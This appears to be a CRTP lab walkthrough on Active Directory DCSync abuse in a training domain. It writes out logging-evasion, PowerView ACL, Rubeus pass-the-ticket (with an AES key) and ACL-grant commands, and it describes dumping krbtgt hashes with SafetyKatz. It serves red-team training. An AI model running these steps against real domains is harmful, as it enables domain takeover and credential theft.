CRTP Lab 12

Task 1:

Check if studentx has Replication (DCSync) rights

If a user doesn't have Replication rights, we can use PowerView to add the current user to the ACL allowing replication rights.

Check if user has replication rights

# Load invisi-shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Load Powerview
. C:\AD\Tools\PowerView.ps1

# check rights
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student372"}

Start a process as DA and add rights

#Start a process as DA 
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt


# Add rights
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student372 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

Reboot and check rights again:

If you receive an output with the ACLs, then it user has been granted the right.

Task 2

Execute the DCSync attack to pull hashes of the krbtgt user.

Run SafetyKatz to abuse this replication right using DCSync.

Open elevated cmd and run SafetyKatz and dump KRBTGT hashes.

PreviousRights AbuseNextSecurity Descriptors

Last updated